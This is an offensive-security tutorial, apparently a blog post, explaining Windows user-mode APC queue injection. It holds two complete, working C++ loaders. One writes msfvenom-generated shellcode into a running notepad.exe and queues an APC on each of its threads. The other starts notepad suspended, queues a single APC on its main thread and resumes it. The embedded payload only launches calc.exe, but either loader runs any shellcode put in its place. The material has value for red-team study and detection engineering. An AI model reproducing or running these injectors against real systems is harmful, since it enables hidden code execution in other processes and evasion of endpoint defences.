User Mode APC Queue Injection

Each thread in a program has its own Asynchronous Procedure Call (APC) queue. This queue contains a list of functions that are executed when the thread enters an alertable state. “Alertable” essentially means the thread is waiting for something to happen, using a wait that allows queued APCs to run in the meantime.

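A thread enters an alertable state by calling one of the following functions:

  • SleepEx()
  • SignalObjectAndWait()
  • WaitForSingleObjectEx()
  • WaitForMultipleObjectsEx()
  • MsgWaitForMultipleObjectsEx()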

Adding functions to the queue can be done using QueueUserAPC. By abusing APC Queues, we can execute arbitrary code in the context of a remote process.


Remote Thread Injection

The code below adds APC functions to threads in a foreign process by:

  • Getting the process PID using the function GetProcessIdByName()
  • Executing EnumerateRemoteThreads() to determine the remote thread IDs
  • Allocating memory in the remote process using VirtualAllocEx(), and writing the shellcode to it with WriteProcessMemory()
  • Finally, calling QueueUserAPC() with a pointer to the allocated shellcode buffer and a handle to each thread

The function signature for QueueUserAPC is:

DWORD QueueUserAPC(
  [in] PAPCFUNC  pfnAPC,     // pointer to our shellcode
  [in] HANDLE    hThread,    // target thread handle
  [in] ULONG_PTR dwData      // A value passed to the APC function. We can ignore this.
);
#include <windows.h>
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <vector>

// Returns the PID of the first process in a Toolhelp snapshot whose executable
// name matches processName (compared case-insensitively with _tcsicmp).
// Returns 0 when the snapshot cannot be created, when the first entry cannot
// be read, or when no entry matches.
DWORD GetProcessIdByName(const TCHAR* processName) {
    const HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32); // must be set before Process32First

    DWORD foundPid = 0;
    for (BOOL more = Process32First(snapshot, &entry); more; more = Process32Next(snapshot, &entry)) {
        if (_tcsicmp(entry.szExeFile, processName) == 0) {
            foundPid = entry.th32ProcessID;
            break;
        }
    }

    // Single exit point: the snapshot handle is released on every path.
    CloseHandle(snapshot);
    return foundPid;
}

// Collects the IDs of every thread in a system-wide thread snapshot whose
// owning process ID equals processId. Returns an empty vector (after writing
// a message to std::cerr) if the snapshot cannot be created or its first
// entry cannot be read.
std::vector<DWORD> EnumerateRemoteThreads(DWORD processId) {
    std::vector<DWORD> ownedThreads;

    const HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to create snapshot of threads" << std::endl;
        return ownedThreads;
    }

    THREADENTRY32 entry;
    entry.dwSize = sizeof(THREADENTRY32); // must be set before Thread32First

    BOOL more = Thread32First(snapshot, &entry);
    if (!more) {
        std::cerr << "Failed to get the first thread" << std::endl;
    }

    // The snapshot covers all threads on the system, so filter by owner here.
    while (more) {
        if (entry.th32OwnerProcessID == processId) {
            ownedThreads.push_back(entry.th32ThreadID);
        }
        more = Thread32Next(snapshot, &entry);
    }

    CloseHandle(snapshot);
    return ownedThreads;
}



// Demo entry point for the "remote thread" variant described in the article:
// looks up notepad.exe, copies the demo payload into it, and queues an APC
// pointing at that payload on each of the process's threads.
//
// Returns 0 when the payload was written and the thread loop ran, 1 when the
// target could not be found/opened or the remote memory could not be prepared.
// Every handle opened here is closed before returning.
int main(int argc, char* argv[])
{

    //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
    unsigned char shellcode[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
    "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
    "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
    "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
    "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
    "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
    "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
    "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
    "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
    "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
    "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
    "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
    "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
    "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
    "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
    "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
    "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
    "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
    "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
    "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

    const TCHAR* processName = _T("notepad.exe");
    const DWORD process_id = GetProcessIdByName(processName);
    if (process_id == 0) {
        // GetProcessIdByName returns 0 for "not found"; continuing would
        // operate on a null process handle and a null buffer.
        std::cerr << "Target process not found" << std::endl;
        return 1;
    }

    //Get a handle to our remote process
    HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
    if (process_handle == nullptr) {
        const DWORD err = GetLastError(); // capture before any stream I/O
        std::cerr << "OpenProcess failed, error " << err << std::endl;
        return 1;
    }

    // Allocate memory in the remote process
    LPVOID buffer = VirtualAllocEx(process_handle, nullptr, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    if (buffer == nullptr) {
        const DWORD err = GetLastError();
        std::cerr << "VirtualAllocEx failed, error " << err << std::endl;
        CloseHandle(process_handle);
        return 1;
    }

    // Write our shellcode to the remote process
    if (!WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), nullptr)) {
        const DWORD err = GetLastError();
        std::cerr << "WriteProcessMemory failed, error " << err << std::endl;
        // Nothing references the allocation yet, so release it again.
        VirtualFreeEx(process_handle, buffer, 0, MEM_RELEASE);
        CloseHandle(process_handle);
        return 1;
    }

    // loop over the available threads and inject our APC functions
    for (DWORD thread_id : EnumerateRemoteThreads(process_id)) {
        std::cout << "Injecting into thread ID: " << thread_id << std::endl;

        HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS, TRUE, thread_id);
        if (thread_handle == nullptr) {
            // A thread may have exited since the snapshot was taken; skip it.
            const DWORD err = GetLastError();
            std::cerr << "OpenThread failed for thread " << thread_id << ", error " << err << std::endl;
            continue;
        }

        if (!QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0)) {
            const DWORD err = GetLastError();
            std::cerr << "QueueUserAPC failed for thread " << thread_id << ", error " << err << std::endl;
        }

        // The handle is only needed for the QueueUserAPC call itself.
        CloseHandle(thread_handle);
    }

    CloseHandle(process_handle);
    return 0;
}

The above code will work, but will result in the shellcode being executed a large number of times, since we have no way of determining when each remote thread will next enter an alertable state. We could inject into a smaller number of threads, but then we have no guarantee the code will trigger in a reasonable timeframe, if at all.


Suspended Thread Execution

To get around the problem of multiple procedures executing at once, we can start a process in a suspended state, queue an APC function on its main thread, then resume the thread. On resuming the thread, our code should execute once.

#include <windows.h>
#include <iostream>

// Demo entry point for the "suspended process" variant described in the
// article: starts notepad.exe suspended, copies the demo payload into it,
// queues one APC on the new process's initial thread, then resumes that thread.
//
// Returns 0 on success and 1 if any step fails. On failure after the process
// has been created, the still-suspended process is terminated so it is not
// left behind. Both handles from PROCESS_INFORMATION are closed on every path.
int main()
{

    //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";


    // Stack-allocated and zero-initialised; nothing to free afterwards.
    STARTUPINFOW startup_info{};
    startup_info.cb = sizeof(STARTUPINFOW);
    startup_info.dwFlags = STARTF_USESHOWWINDOW;
    PROCESS_INFORMATION process_info{};

    // CreateProcessW may modify the command-line buffer, so it must be writable.
    wchar_t cmd[] = L"notepad.exe";

    // Create suspended notepad process. The W variant is called explicitly so
    // the wide-character arguments compile regardless of the UNICODE setting.
    if (!CreateProcessW(nullptr, cmd, nullptr, nullptr, FALSE, CREATE_NO_WINDOW | CREATE_SUSPENDED, nullptr, nullptr, &startup_info, &process_info)) {
        const DWORD err = GetLastError(); // capture before any stream I/O
        std::cerr << "CreateProcessW failed, error " << err << std::endl;
        return 1;
    }

    HANDLE process_handle = process_info.hProcess;
    HANDLE thread_handle = process_info.hThread;
    int exit_code = 1;

    // Allocate & write memory
    LPVOID buffer = VirtualAllocEx(process_handle, nullptr, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    if (buffer == nullptr) {
        const DWORD err = GetLastError();
        std::cerr << "VirtualAllocEx failed, error " << err << std::endl;
    }
    else if (!WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), nullptr)) {
        const DWORD err = GetLastError();
        std::cerr << "WriteProcessMemory failed, error " << err << std::endl;
    }
    //Execute the APC
    else if (!QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0)) {
        const DWORD err = GetLastError();
        std::cerr << "QueueUserAPC failed, error " << err << std::endl;
    }
    //Continue the thread
    else if (ResumeThread(thread_handle) == static_cast<DWORD>(-1)) {
        const DWORD err = GetLastError();
        std::cerr << "ResumeThread failed, error " << err << std::endl;
    }
    else {
        exit_code = 0;
    }

    if (exit_code != 0) {
        // The child was never resumed; do not leave a suspended process behind.
        TerminateProcess(process_handle, 1);
    }

    CloseHandle(thread_handle);
    CloseHandle(process_handle);
    return exit_code;
}

In Conclusion

This post covered the basics of implementing user mode APCs to execute shellcode. Interestingly, kernel APCs are often used by EDR solutions to inject hooking code into a monitored application.